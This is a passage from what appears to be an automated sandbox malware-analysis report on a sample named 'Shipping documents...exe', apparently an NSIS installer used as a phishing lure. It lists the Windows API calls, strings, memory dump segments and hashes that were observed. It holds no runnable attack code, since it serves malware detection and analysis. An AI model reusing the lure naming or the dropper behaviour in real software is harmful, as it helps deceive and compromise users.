                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]
                                        • API String ID: 2171350718-461813615
                                        • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                        • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                        • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                        • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                        APIs
                                        • GetCommandLineW.KERNEL32(00000400), ref: 6FE81B96
                                        • lstrcpynW.KERNEL32(?,00000000), ref: 6FE81BA4
                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6FE81C03
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FE81C15
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 6FE81C22
                                        • CloseHandle.KERNEL32(?), ref: 6FE81C31
                                        • CloseHandle.KERNEL32(?), ref: 6FE81C36
                                        • ExitProcess.KERNEL32 ref: 6FE81C3B
                                        • ExitProcess.KERNEL32 ref: 6FE81C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                         • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Process$Exit$CloseHandle$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                        • String ID: "$D
                                        • API String ID: 2956148522-1154559923
                                        • Opcode ID: 1d941b3dee5f3963ad1899b3ca2a608bc7806bb7e2ada5b28301a42859932711
                                        • Instruction ID: 73d955312f501d815e8978bd6bec794098d44492d84bc501cfcd5b13944da93d
                                        • Opcode Fuzzy Hash: 1d941b3dee5f3963ad1899b3ca2a608bc7806bb7e2ada5b28301a42859932711
                                        • Instruction Fuzzy Hash: FC21A171804519EADF25BBE0CD08ADFBF79FF02325F600016E23AB6190DB741A55DBA1
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                        • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
                                        • "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe", xrefs: 00406849
                                        • *?|<>/":, xrefs: 00406857
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-1390672379
                                        • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                        • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                        • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                        • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                        • GetSysColor.USER32(00000000), ref: 00404598
                                        • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                        • SetBkMode.GDI32(?,?), ref: 004045B0
                                        • GetSysColor.USER32(?), ref: 004045C3
                                        • SetBkColor.GDI32(?,?), ref: 004045D3
                                        • DeleteObject.GDI32(?), ref: 004045ED
                                        • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                        • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                        • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                        APIs
                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                          • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                        • String ID: 9
                                        • API String ID: 163830602-2366072709
                                        • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                        • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                        • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                        • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6FE810E0), ref: 6FE81990
                                        • GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6FE810E0), ref: 6FE8199E
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6FE819BD
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6FE819E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                         • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                        • String ID: IsWow64Process2$KERNEL32
                                        • API String ID: 977827838-1019154776
                                        • Opcode ID: 2bcfab48608436a10e47b3dcd3cb787af1425c809e75d71b2655ec8cf541d14b
                                        • Instruction ID: b468e029d4233696777abd10a77843f3d9114a0b23527e5c4b4931cf7e8535de
                                        • Opcode Fuzzy Hash: 2bcfab48608436a10e47b3dcd3cb787af1425c809e75d71b2655ec8cf541d14b
                                        • Instruction Fuzzy Hash: E0014075D00649BADB02AAE4CC45AEF7FBD9F06254F104052A931E2191EB78EA05C761
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                        • GetMessagePos.USER32 ref: 00404EB4
                                        • ScreenToClient.USER32(?,?), ref: 00404ECE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                        • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                        • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                        • MulDiv.KERNEL32(0002F000,00000064,000B2368), ref: 00402FE1
                                        • wsprintfW.USER32 ref: 00402FF1
                                        • SetWindowTextW.USER32(?,?), ref: 00403001
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402FEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                        • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                        • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                        • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                        • GlobalFree.KERNEL32(?), ref: 00402A0B
                                        • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                        • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                        • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                        • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                        APIs
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                          • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405EDF
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405F87
                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsi1309.tmp
                                        • API String ID: 3248276644-4229099359
                                        • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                        • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                        • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                        • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401D9F
                                        • GetClientRect.USER32(?,?), ref: 00401DEA
                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                        • DeleteObject.GDI32(00000000), ref: 00401E3E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                        • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                        • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                        • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E56
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                        • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                        • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                        • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                        APIs
                                        • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                        • wsprintfW.USER32 ref: 00404E2D
                                        • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
